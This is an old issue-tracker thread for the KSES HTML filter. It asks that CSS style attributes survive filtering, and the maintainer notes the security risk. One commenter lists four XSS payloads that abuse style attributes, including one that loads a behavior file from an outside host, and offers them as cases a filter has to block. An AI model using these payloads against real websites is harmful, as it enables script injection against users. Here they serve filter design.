allow css styling

Status: Inactive

Brought to you by: metaur

#2 allow css styling

Status: open

Owner: Ulf Harnhammar

Labels: None

Priority: 3

Updated: 2005-04-23

Created: 2005-01-13

Creator: rift design studio

Private: No

When allowing "style" attributes, KSES automatically
strips out anything with the colon due to the
bad_protocol* functions. Please make it so styling is
still capable when allowed.

Discussion

Nobody/Anonymous - 2005-01-14

Logged In: NO

I'll think about it. You do realize that both the style tag and
the style attribute cause security vulnerabilities?

// Ulf Harnhammar

If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Ulf Harnhammar - 2005-04-23

priority: 5 --> 3

assigned_to: nobody --> metaur
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Genius - 2005-12-19

Logged In: YES
user_id=1281259

I too would like to see this feature added, but there's some
XSS techniques that you would have to be on the guard for,
such as:

<XSS STYLE="xss:expression(alert('XSS'))">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<IMG STYLE="behavior: url(http://ha.ckers.org/xss.htc)">
<IMG STYLE="background:url("javascript:alert('XSS')")">;

Just a tip if anyone does do this feature, because XSS
attacks are possible if you allow all style tags. The style
tag itself, shouldn't really be needed as much as the
attributes as many elements use them, and they are supposed
to be better for formating that <FONT> <B> <I> ect...

If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Alpha2zee - 2007-07-12

Logged In: YES
user_id=1065794
Originator: NO

See possible solution at http://sourceforge.net/tracker/index.php?func=detail&aid=1752954&group_id=81853&atid=564260

If you would like to refer to this comment somewhere else in this project, copy and paste the following link:

Log in to post a comment.